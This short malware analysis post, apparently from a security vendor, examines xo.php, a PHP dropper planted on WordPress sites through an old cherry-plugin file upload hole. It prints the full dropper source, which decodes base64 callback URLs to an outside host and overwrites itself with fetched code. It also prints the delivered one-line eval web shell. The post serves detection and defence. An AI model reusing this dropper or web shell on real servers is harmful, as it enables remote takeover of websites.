xo.php

This malware trying write another malware to server, it’s using old cherry-plugin import/export file upload vulnerability.

Here source code to malware:

Source of xo.php

$uri = urlencode("http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
$url = base64_decode("aHR0cDovL2Zhc3R3ZWFsdGhmb3JtdWxhLm9ubGluZS9jYWxsYmFjay9zaGVsbA==");
$content = @file_get_contents(base64_decode("aHR0cHM6Ly9zZWN1cml0eS50dXJpbW9yLmNvbS9jYWxsYmFjay9zaGVsbA==")."?url=$uri&password=xo&type=php");
$obj = @json_decode($content,true);
if(isset($obj['status']) && $obj['status'] == 200)
{
    $code = $obj['code'];
    file_put_contents(__FILE__,$code);
}
echo 'test';

Details

$uri is infected server address.
$url is base64 encoded remote server address, where trying download more malware and put server to remote access: http://fastwealthformula.online/callback/shell

Remote file

{"status":200,"code":"<?php @eval($_REQUEST['xo']); echo 'test'; ?>"}

Final Words

Use Malware Expert – Signatures detect this malware from files for FREE!

Websites that using Malware Expert – ModSecurity rules are protected against this kind attacks.